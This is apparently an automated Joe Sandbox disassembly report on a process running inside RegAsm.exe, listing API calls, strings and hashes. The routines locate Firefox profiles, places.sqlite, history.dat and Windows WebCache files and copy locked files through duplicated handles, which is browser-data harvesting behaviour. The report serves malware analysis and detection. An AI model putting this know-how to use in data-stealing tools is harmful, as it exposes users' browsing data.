                                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                      • API String ID: 4039892925-3369679110
                                                                                                                                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                                      • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateErrorFileLastfree
                                                                                                                                                                      • String ID: |A
                                                                                                                                                                      • API String ID: 981974120-1717621600
                                                                                                                                                                      • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                      • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                      • String ID: $0.@
                                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                      • API String ID: 1534475566-1174173950
                                                                                                                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 669240632-0
                                                                                                                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                      • memset.MSVCRT ref: 00414C87
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                      Strings
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                      • API String ID: 2925649097-2036018995
                                                                                                                                                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                      APIs
                                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                      • String ID: "%s"
                                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                      • String ID: @ $SQLite format 3
                                                                                                                                                                      • API String ID: 1475443563-3708268960
                                                                                                                                                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmpqsort
                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                      • API String ID: 1579243037-1578091866
                                                                                                                                                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModuleProcessTimes
                                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                      • API String ID: 116129598-3385500049
                                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                      • memset.MSVCRT ref: 0040E629
                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                      Strings
                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                      • API String ID: 2887208581-2114579845
                                                                                                                                                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset
                                                                                                                                                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                      • API String ID: 2221118986-1725073988
                                                                                                                                                                      • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                      • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                      • String ID: $$8
                                                                                                                                                                      • API String ID: 1475443563-435121686
                                                                                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1979745280-0
                                                                                                                                                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                                                                                      • API String ID: 2641622041-467022611
                                                                                                                                                                      • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                      • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
